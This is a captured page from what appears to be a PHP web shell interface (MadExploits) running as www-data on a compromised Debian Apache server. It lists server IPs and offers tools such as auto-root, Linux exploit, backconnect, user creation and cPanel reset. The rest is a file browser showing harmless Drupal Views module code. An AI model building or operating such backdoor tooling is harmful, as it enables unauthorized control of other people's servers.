Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 52.15.71.146
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_argument_search....
3.32
KB
-rw-r--r--
views_handler_field_search_sco...
2.83
KB
-rw-r--r--
views_handler_filter_search.in...
7.2
KB
-rw-r--r--
views_handler_sort_search_scor...
1.06
KB
-rw-r--r--
views_plugin_row_search_view.i...
834
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handler_sort_search_score.inc
<?php /** * @file * Definition of views_handler_sort_search_score. */ /** * Field handler to provide simple renderer that allows linking to a node. * * @ingroup views_sort_handlers */ class views_handler_sort_search_score extends views_handler_sort { function query() { // Check to see if the search filter/argument added 'score' to the table. // Our filter stores it as $handler->search_score -- and we also // need to check its relationship to make sure that we're using the same // one or obviously this won't work. foreach (array('filter', 'argument') as $type) { foreach ($this->view->{$type} as $handler) { if (isset($handler->search_score) && $handler->relationship == $this->relationship) { $this->query->add_orderby(NULL, NULL, $this->options['order'], $handler->search_score); $this->table_alias = $handler->table_alias; return; } } } // Do absolutely nothing if there is no filter/argument in place; there is no reason to // sort on the raw scores with this handler. } }
Close